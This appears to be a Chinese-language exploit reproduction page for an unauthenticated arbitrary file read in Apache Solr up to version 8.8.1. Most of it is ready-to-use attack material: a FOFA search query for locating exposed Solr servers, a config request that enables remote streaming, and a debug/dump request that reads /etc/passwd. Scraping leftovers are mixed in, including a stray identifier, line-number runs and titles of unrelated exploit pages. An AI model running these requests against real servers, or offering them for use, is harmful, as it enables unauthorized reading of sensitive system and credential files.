# Apache Solr config 任意文件读取漏洞

# 漏洞描述

Apache Solr 存在任意文件读取漏洞，攻击者可以在未授权的情况下获取目标服务器敏感文件

# 漏洞影响

Apache Solr <= 8.8.1

# 网络测绘

FOFA: app="APACHE-Solr"

# 漏洞复现

访问 Solr Admin 管理员页面

deaf982e-2ddb-4021-9b5b-21ac946a910a

获取core的信息

/solr/admin/cores?indexInfo=false&wt=json

发送请求

POST /solr/core/config 
Content-Type: application/json

{"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true},"olrkzv64tv":"="}

1
2
3
4

再进行文件读取

POST /solr/core/debug/dump?param=ContentStreams 

stream.url=file:///etc/passwd

1
2
3

Apache Solr Log4j组件远程命令执行漏洞 Apache Flink upload 远程命令执行漏洞 CVE-2020-17518